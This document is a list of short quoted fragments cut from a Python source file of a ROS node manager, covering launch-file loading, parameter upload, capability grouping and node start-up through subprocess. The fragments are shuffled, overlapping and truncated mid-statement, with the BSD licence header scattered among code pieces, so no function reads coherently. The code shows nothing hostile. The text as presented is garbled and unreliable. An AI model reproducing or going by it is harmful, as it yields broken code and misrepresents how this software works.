"OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY",
"'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with",
"server if self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK to let",
"the absolute path of the launch file @rtype: C{str} @raise LoadException: if the",
"XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy",
"launch file in the given package. If more then one launch file with",
"cmd = [cmd] if cmd is None or len(cmd) == 0: raise StartException('%s",
"# set the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv)))",
"provided that the following conditions # are met: # # * Redistributions of",
"with or without # modification, are permitted provided that the following conditions #",
"view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() #",
"itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item break if",
"= self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name))",
"= rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item break if n",
"SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND",
"n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0:",
"roslib.names.SEP # if the 'capability_group' parameter found, assign node to the group if",
"self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load the launchfile info local",
"return [] # def rosservice_load_launch(self, req): # ''' # Load the launch file",
"= None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname ==",
"= {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime =",
"import roslib.names import roslib.network import rospy import shlex import std_srvs.srv import subprocess import",
"self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv =",
"= roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability group parameter in",
"try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s: %s\", n,",
": str, 'description' : str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr",
"groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns = cap_ns # add",
"delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if",
"str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr = dict() if self.roscfg",
"C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))} '''",
"''' Loads all parameter into ROS parameter server. ''' params = dict() for",
"if n.launch_prefix is not None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s'",
"onto the parameter server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as",
"node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not None and",
"% (path, package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS service to",
"not in result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if ns",
"[] # def rosservice_load_launch(self, req): # ''' # Load the launch file #",
"in argv: in_filter = False for f in afilter: if a.startswith(f): in_filter =",
"sensor name, sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description",
"[(sensor type, sensor name, sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar:",
"Redistributions in binary form must reproduce the above # copyright notice, this list",
"launch file to inform the caller about a new configuration. ''' self.description_response =",
"self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback #",
"= rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\"",
"distribution. # * Neither the name of Fraunhofer nor the names of its",
"Fraunhofer FKIE/US, <NAME> # All rights reserved. # # Redistribution and use in",
"(path, package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS service to get",
"[cmd] if cmd is None or len(cmd) == 0: raise StartException('%s in package",
"''' self.package = '' self.file = '' self.__lock = threading.RLock() # Load parameter",
"Capability() cap.namespace = ns cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images'])",
"License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved.",
"def getPath(self, path, package=''): ''' Searches for a launch file. If package is",
"capabilities description stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str,",
"def _masteruri_from_ros(self): ''' Returns the master URI depending on ROS distribution API. @return:",
"same name found in the package, the first one will be tacked. @param",
"False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process",
"= param_server_multi() # for code, msg, _ in r: # if code !=",
"True break if not added: ns = cap_ns # add new group in",
"add node environment parameter for k, v in n.env_args: new_env[k] = v #",
"group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name = group cap.type",
"n.machine_name and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader",
"containing the launch file or an empty string, if the C{file} is an",
"\"\"\" Load parameters onto the parameter server \"\"\" try: import xmlrpclib except ImportError:",
"respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args",
"@type val: str @return: the decoded string @rtype: C{unicode} or original on error",
"added = True break if not added: ns = cap_ns # add new",
"= entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get",
"self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result",
"FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT",
"AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT",
"THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED",
"C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback',",
"expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else: for",
"the current working path, Default: the package of the node cwd = self.get_ros_home()",
"= {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\",",
"except: pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic =",
"__init__(self): self.nodes = [] '''@ivar: the list with names of nodes with name",
"n, e) self.do_autostart = False def _decode(self, val): ''' Replaces the '\\\\n' by",
"timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False))",
"avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts",
"self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename):",
"EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES",
"the list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback",
"result def load(self, delay_service_creation=0.): ''' Load the launch file configuration ''' with self.__lock:",
"param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic):",
"entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get",
"Replaces the '\\\\n' by LF (Line Feed) and decode the string entry from",
"remove the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try: for k",
"# env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the",
"if the parameter group parameter found, assign node to the group if not",
"is not None: self.listService.shutdown('reload config') self.listService = None self.nodes = [] # the",
"# masteruri = self.masteruri # if n.machine_name and not n.machine_name == 'localhost': #",
"by LF (Line Feed) and decode the string entry from system default coding",
"type, sensor name, sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot",
"endorse or promote products derived # from this software without specific prior written",
"if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return",
"# raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are not reusable",
"isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format, expected:",
"{'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for item",
"to find the launch file in the given package. If more then one",
"set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:=']",
"'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '',",
"cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables are",
"'capability_group') cap_ns = node_fullname # find the capability group parameter in namespace while",
"C{file} is an absolute path @type package: C{str} @return: the absolute path of",
"given name from the currently loaded configuration. @param node: the name of the",
"bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try:",
"configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService = None if self.listService",
"of the node @type node: C{str} @raise StartException: if an error occurred while",
"p) r = param_server_multi() # for code, msg, _ in r: # if",
"'''@ivar: the list with names of nodes with name spaces.''' self.sensors = {}",
"not found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS",
"'_launch_file:='] result = [] for a in argv: in_filter = False for f",
"must retain the above copyright # notice, this list of conditions and the",
"= group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes =",
"for autostart required topic `%s` is ignored!' % topic) topic = '' elif",
"* Redistributions in binary form must reproduce the above # copyright notice, this",
"or original on error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result =",
"OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE.",
"argv: in_filter = False for f in afilter: if a.startswith(f): in_filter = True",
"0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay']))",
"raise StartException(str(e)) except Exception as e: raise StartException(str(e)) # handle different result types",
"paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s]",
"error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code,",
"ns = cap_ns # add new group in the namespace of the node",
"(BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights",
"self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd =",
"threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and autostart and",
"f in afilter: if a.startswith(f): in_filter = True break if ':=' not in",
"len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param)",
"n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0])",
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\"",
"[] def rosservice_description(self, req): ''' Returns the current description. ''' return self.description_response def",
"= self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if",
"are found! The first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd,",
"== 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args:",
"used to endorse or promote products derived # from this software without specific",
"import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call",
"% self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if",
"self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load',",
"self.sensors = {} '''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name,",
"much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for",
"@type node: C{str} @raise StartException: if an error occurred while start. ''' if",
"of nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name",
"not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1]",
"Loads all parameter into ROS parameter server. ''' params = dict() for param,",
"if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for",
"traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a launch file. If",
"in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is used in cpp",
"is an absolute path @type package: C{str} @return: the absolute path of the",
"autostart\", n.name) return # env = n.env_args prefix = n.launch_prefix if n.launch_prefix is",
"thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except: pass # print the",
"ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import",
"''' The exception throwing while searching for the given launch file. ''' pass",
"ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will be created on each",
"[], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the",
"master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required == topic:",
"rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import",
"''' self.listService = None '''@ivar: The service will be created on each load",
", LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os",
"except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try:",
"get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in",
"PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS",
"= rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri()",
"default @type val: str @return: the decoded string @rtype: C{unicode} or original on",
"self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes)",
"import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy import shlex import",
"A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER",
"std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will be",
"remove from pending autostarts try: self._pending_starts.remove(node) except: pass # print the current pending",
"None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd",
"node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node",
"self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback",
"None): args.append('__cwd:=%s' % n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s' %",
"entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',')",
"this as it causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key,",
"ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine",
"caller about a new configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService",
"result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type':",
"self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error",
"= self._decode(entry[4]) break except: pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc()",
"in the documentation and/or other materials provided # with the distribution. # *",
"[%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg, _ in r:",
"StartException(str(e)) # handle different result types str or array of string if sys.version_info[0]",
"req): self.load(2.) return [] # def rosservice_load_launch(self, req): # ''' # Load the",
"forms, with or without # modification, are permitted provided that the following conditions",
"machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns,",
"EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,",
"parameter found, assign node to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value:",
"in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd,",
"the launchfile info local namespace sys.argv = list(argv) # set the global environment",
"for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0]",
"n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) #",
"launch file # ''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) #",
"'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master",
"'description' : str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr = dict()",
"Load parameters onto the parameter server \"\"\" try: import xmlrpclib except ImportError: import",
"LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None",
"Neither the name of Fraunhofer nor the names of its # contributors may",
"ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names import",
"IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED.",
"if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch)",
"else: string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd is",
"def rosservice_load_launch(self, req): # ''' # Load the launch file # ''' #",
"ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF",
"while start %s: %s\", n, e) self.do_autostart = False def _decode(self, val): '''",
"= n.env_args prefix = n.launch_prefix if n.launch_prefix is not None else '' args",
"server. ''' params = dict() for param, value in self.roscfg.params.items(): params[param] = value",
"rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService =",
"[] '''@ivar: the list with names of nodes with name spaces.''' self.sensors =",
"cap = Capability() cap.namespace = ns cap.name = group cap.type = descr_dict['type'] cap.images",
"then one launch file is found, take the first one launch_file = paths[0]",
"n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params =",
"services to inform the caller about a new configuration. if self.runService is not",
"# machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: # env[len(env):]",
"delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer =",
"if not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter found, assign",
"API. @return: ROS master URI @rtype: C{str} ''' try: import rospkg.distro distro =",
"SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF",
"one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s",
"the ROS services # HACK to let the node_manager to update the view",
"the capabilities description # use two separate loops, to create the description list",
"[] def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req): # '''",
"may be used to endorse or promote products derived # from this software",
"%s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment new_env",
"if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter",
"_get_node(self, pkg, filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException",
"DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE",
"result def _masteruri_from_ros(self): ''' Returns the master URI depending on ROS distribution API.",
"n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start",
"# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #",
"cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not",
"waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart))",
"'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get",
"more then one launch file is found, take the first one launch_file =",
", ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching for the given",
"-> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images':",
"above # copyright notice, this list of conditions and the following # disclaimer",
"in result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] =",
"dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get the sensor",
"new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass",
"= param_server_multi() for code, msg, _ in r: if code != 1: raise",
"= descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) #",
"= threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except: pass",
"dict() if self.roscfg is not None: # get the capabilities description # use",
"pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value)",
"pass class StartException(Exception): ''' The exception throwing while run a node containing in",
"types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd",
"# contributors may be used to endorse or promote products derived # from",
"_run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node)",
"for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri #",
"# #2468 unify clear params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(),",
"param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0]",
"= rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv =",
"= self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine =",
"p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0 and",
"added: ns = cap_ns # add new group in the namespace of the",
"(remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name and not n.machine_name ==",
"{'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self):",
"cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param",
"for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while",
"None self.nodes = [] # the name of nodes with namespace self.sensors =",
"more then one launch file with the same name found in the package,",
"= False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability",
"`%s` is ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic): topic =",
"not None: self.runService.shutdown('reload config') self.runService = None if self.listService is not None: self.listService.shutdown('reload",
"not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter found, assign node",
"@rtype: C{str} @raise LoadException: if the given file is not found ''' launch_file",
"# All rights reserved. # # Redistribution and use in source and binary",
"node_fullname # find the capability group parameter in namespace while cap_param not in",
"cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run",
"provided # with the distribution. # * Neither the name of Fraunhofer nor",
"'description'] -> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]),",
"@classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the parameter server",
"print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else: for entry",
"if self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK to let the",
"rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return",
"= {'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def",
"= shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove",
"the string entry from system default coding to unicode. @param val: the string",
"set, try to find the launch file in the given package if package:",
"# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS",
"self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service",
"Start the timer for waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd,",
"modification, are permitted provided that the following conditions # are met: # #",
"except: pass # print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear()",
"LoadException('File %s in package [%s] not found!' % (path, package)) def rosservice_list_nodes(self, req):",
"currently loaded configuration. @param node: the name of the node @type node: C{str}",
"= roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP)",
"for the given launch file. ''' pass class StartException(Exception): ''' The exception throwing",
"cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args)))",
"self.listService.shutdown('reload config') self.listService = None self.nodes = [] # the name of nodes",
"try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node,",
"''' self.description_response = ListDescriptionResponse() # variables to print the pending autostart nodes self._pending_starts",
"> 0: # if more then one launch file is found, take the",
"autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None try:",
"except: pass # add node environment parameter for k, v in n.env_args: new_env[k]",
"for p in params.itervalues(): # suppressing this as it causes too much spam",
"be tacked. @param path: the file name of the launch file @type path:",
"= self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime']",
"v in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is used in",
"available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS",
"file. ''' pass class StartException(Exception): ''' The exception throwing while run a node",
"in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home()",
"of conditions and the following # disclaimer in the documentation and/or other materials",
"and C{capability_group} parameter and creates dictionary for grouping the nodes. @return: the capabilities",
"HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,",
"causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r =",
"pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value)",
"if len(cmd) > 1: raise StartException('Multiple executables are found! The first one was",
"p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'],",
"respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d'",
"return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls,",
